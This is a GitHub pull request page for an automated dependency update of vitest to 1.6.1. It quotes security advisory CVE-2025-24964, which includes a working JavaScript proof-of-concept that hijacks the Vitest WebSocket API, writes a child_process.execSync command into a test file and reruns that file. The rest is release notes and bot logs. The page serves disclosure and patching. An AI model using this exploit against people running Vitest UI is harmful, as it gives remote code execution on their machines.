Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

chore(deps): update dependency vitest to v1.6.1 [security] #9210

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open

chore(deps): update dependency vitest to v1.6.1 [security] #9210

wants to merge 1 commit into from
+43 −43

Conversation

renovate[bot]
Copy link
Contributor

@renovate renovate bot commented Feb 4, 2025

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
vitest (source) 1.4.0 -> 1.6.1 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2025-24964

Summary

Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.

Details

When api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46

This WebSocket server has saveTestFile API that can edit a test file and rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile API and then running that file by calling the rerun API.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76

PoC

  1. Open Vitest UI.
  2. Access a malicious web site with the script below.
  3. If you have calc executable in PATH env var (you'll likely have it if you are running on Windows), that application will be executed.
// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});

// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
    console.log(e.data)
})
ws.addEventListener('open', () => {
    ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

    const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"

    // edit file content to inject command execution
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "saveTestFile",
      a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
    }))
    // rerun the tests to run the injected command execution code
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "rerun",
      a: [testFilePath]
    }))
})

Impact

This vulnerability can result in remote code execution for users that are using Vitest serve API.

Release Notes

vitest-dev/vitest (vitest)

v1.6.1

Compare Source

   🐞 Bug Fixes
    View changes on GitHub

v1.6.0

Compare Source

   🚀 Features
   🐞 Bug Fixes
   🏎 Performance
    View changes on GitHub

v1.5.3

Compare Source

   🐞 Bug Fixes
    View changes on GitHub

v1.5.2

Compare Source

   🐞 Bug Fixes
    View changes on GitHub

v1.5.1

Compare Source

   🚀 Features
   🐞 Bug Fixes
    View changes on GitHub

v1.5.0

Compare Source

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Madrid, Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot added the dependencies Pull requests that update a dependency file label Feb 4, 2025
@renovate renovate bot enabled auto-merge (squash) February 4, 2025 18:41
@vercel Vercel
Copy link

vercel bot commented Feb 4, 2025
edited
Loading

The latest updates on your projects. Learn more about Vercel for Git ↗︎

Name Status Preview Comments Updated (UTC)
unleash-monorepo-frontend ✅ Ready (Inspect) Visit Preview 💬 Add feedback Feb 19, 2025 2:04am
1 Skipped Deployment
Name Status Preview Comments Updated (UTC)
unleash-docs ⬜️ Ignored (Inspect) Visit Preview Feb 19, 2025 2:04am

@github-actions GitHub Actions
Copy link
Contributor

github-actions bot commented Feb 4, 2025
edited
Loading

Dependency Review

✅ No vulnerabilities or license issues or OpenSSF Scorecard issues found.

OpenSSF Scorecard

PackageVersionScoreDetails
npm/vitest 1.6.1 UnknownUnknown
npm/@vitest/expect 1.6.1 UnknownUnknown
npm/@vitest/runner 1.6.1 UnknownUnknown
npm/@vitest/snapshot 1.6.1 UnknownUnknown
npm/@vitest/spy 1.6.1 UnknownUnknown
npm/@vitest/utils 1.6.1 UnknownUnknown
npm/vite-node 1.6.1 UnknownUnknown
npm/vitest 1.6.1 UnknownUnknown

Scanned Files

  • frontend/package.json
  • frontend/yarn.lock

@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 27912f0 to 0efc872 Compare February 4, 2025 18:48
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 0efc872 to e2c8d54 Compare February 5, 2025 01:35
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from e2c8d54 to 4b5df8e Compare February 5, 2025 04:24
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 4b5df8e to ba8fd98 Compare February 5, 2025 08:49
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from ba8fd98 to f6f0791 Compare February 5, 2025 09:06
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from f6f0791 to 81571da Compare February 5, 2025 09:47
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 81571da to 393bfaf Compare February 5, 2025 10:13
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 393bfaf to 657bded Compare February 5, 2025 10:29
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 657bded to 20a5fb5 Compare February 5, 2025 10:52
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 20a5fb5 to e983cbe Compare February 5, 2025 13:04
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from e983cbe to 0b2714a Compare February 5, 2025 14:47
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 0b2714a to e10c989 Compare February 5, 2025 15:29
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 77c69c3 to 88a925a Compare February 14, 2025 08:49
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 88a925a to 2124dcc Compare February 14, 2025 09:45
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 2124dcc to a1b816e Compare February 14, 2025 10:30
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from a1b816e to 92d355a Compare February 14, 2025 13:34
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 92d355a to 047d515 Compare February 14, 2025 13:37
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 047d515 to 434c342 Compare February 14, 2025 13:54
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 434c342 to 2a06261 Compare February 17, 2025 08:02
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 2a06261 to e155a5e Compare February 17, 2025 09:43
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from e155a5e to 9062e7c Compare February 17, 2025 11:09
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 9062e7c to 2305247 Compare February 17, 2025 12:42
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 2305247 to 37270af Compare February 18, 2025 09:32
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 37270af to 5334754 Compare February 18, 2025 10:37
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 5334754 to 10382c4 Compare February 18, 2025 12:36
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 10382c4 to fb35511 Compare February 19, 2025 02:02
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@renovate-approve renovate-approve[bot] renovate-approve[bot] approved these changes

Assignees
No one assigned
Labels
dependencies Pull requests that update a dependency file
Projects
Issues and PRs
Status: Approved PRs
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
0 participants